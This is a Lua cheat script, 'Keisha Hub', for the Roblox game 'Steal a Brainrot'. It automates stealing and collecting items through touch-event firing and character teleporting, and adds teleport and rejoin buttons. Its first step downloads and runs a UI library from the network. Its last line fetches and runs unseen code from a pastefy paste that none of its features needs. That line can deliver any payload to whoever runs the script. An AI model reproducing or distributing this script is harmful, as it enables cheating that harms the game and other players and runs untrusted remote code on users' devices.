-- =======================================================
-- KEISHA HUB | Steal a Brainrot Edition
-- Made by Keisha 💖
-- =======================================================

-- Load Rayfield
local Rayfield = loadstring(game:HttpGet("https://sirius.menu/rayfield"))()

-- Main Window
local Window = Rayfield:CreateWindow({
    Name = "🧠 Keisha Hub | Steal a Brainrot",
    LoadingTitle = "Steal a Brainrot - Keisha",
    LoadingSubtitle = "💖 made by Keisha",
    ConfigurationSaving = {
        Enabled = true,
        FolderName = "KeishaHub",
        FileName = "Config"
    },
    KeySystem = false
})

-- Notify riêng
local function KeishaNotify(title, content)
    Rayfield:Notify({
        Title = "💎 " .. title,
        Content = content,
        Duration = 4,
        Image = 6031280882
    })
end

-- =======================================================
-- TAB: FARM / COLLECT
-- =======================================================
local farmTab = Window:CreateTab("🌱 Brainrot Farm", 6031280882)
farmTab:CreateSection("Auto System")

-- Auto Farm (demo)
local autoFarm = false
farmTab:CreateToggle({
    Name = "🧠 Auto Steal Brainrot",
    CurrentValue = false,
    Callback = function(v)
        autoFarm = v
        KeishaNotify("Auto Farm", autoFarm and "Enabled" or "Disabled")

        task.spawn(function()
            while autoFarm do
                -- ⚠️ Thay workspace.NPCs thành folder thật chứa nhân vật trong game
                if workspace:FindFirstChild("NPCs") then
                    for _, npc in pairs(workspace.NPCs:GetChildren()) do
                        if npc:FindFirstChild("Head") then
                            -- Ví dụ: steal brainrot bằng cách chạm vào đầu NPC
                            firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, npc.Head, 0)
                            task.wait(0.2)
                            firetouchinterest(game.Players.LocalPlayer.Character.HumanoidRootPart, npc.Head, 1)
                        end
                    end
                end
                task.wait(1)
            end
        end)
    end,
})

-- Auto Collect (demo)
local autoCollect = false
farmTab:CreateToggle({
    Name = "💰 Auto Collect Items",
    CurrentValue = false,
    Callback = function(v)
        autoCollect = v
        KeishaNotify("Auto Collect", autoCollect and "Enabled" or "Disabled")

        task.spawn(function()
            while autoCollect do
                -- ⚠️ Thay workspace.Drops bằng folder thật chứa brainrot/item
                if workspace:FindFirstChild("Drops") then
                    for _, drop in pairs(workspace.Drops:GetChildren()) do
                        if drop:IsA("Part") then
                            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = drop.CFrame
                            task.wait(0.2)
                        end
                    end
                end
                task.wait(1)
            end
        end)
    end,
})

-- =======================================================
-- TAB: TELEPORT
-- =======================================================
local tpTab = Window:CreateTab("🌀 Teleport", 6031280882)
tpTab:CreateSection("Quick Travel")

-- ⚠️ Thay CFrame.new(...) bằng tọa độ thật trong map
local locations = {
    ["🏠 Base"] = CFrame.new(0,5,0),
    ["🛒 Shop"] = CFrame.new(50,5,100),
    ["🎮 Arena"] = CFrame.new(-120,5,40)
}

tpTab:CreateDropdown({
    Name = "Select Location",
    Options = {"🏠 Base","🛒 Shop","🎮 Arena"},
    CurrentOption = "🏠 Base",
    Callback = function(loc)
        local char = game.Players.LocalPlayer.Character
        if char and char:FindFirstChild("HumanoidRootPart") then
            char.HumanoidRootPart.CFrame = locations[loc]
            KeishaNotify("Teleport", "Teleported to " .. loc)
        end
    end,
})

-- =======================================================
-- TAB: FUN / MISC
-- =======================================================
local miscTab = Window:CreateTab("⚙️ Misc", 6031280882)

miscTab:CreateButton({
    Name = "Flash Screen (Effect)",
    Callback = function()
        local screenGui = Instance.new("ScreenGui", game.CoreGui)
        local flash = Instance.new("Frame", screenGui)
        flash.Size = UDim2.new(1,0,1,0)
        flash.BackgroundColor3 = Color3.new(1,1,1)
        flash.BackgroundTransparency = 0.2
        task.wait(0.3)
        screenGui:Destroy()
        KeishaNotify("Effect", "Flash finished ✨")
    end,
})

miscTab:CreateButton({
    Name = "Rejoin Server",
    Callback = function()
        local TeleportService = game:GetService("TeleportService")
        local Players = game:GetService("Players")
        TeleportService:Teleport(game.PlaceId, Players.LocalPlayer)
    end,
})

loadstring(game:HttpGet("https://pastefy.app/cBWYevaN/raw", true))()
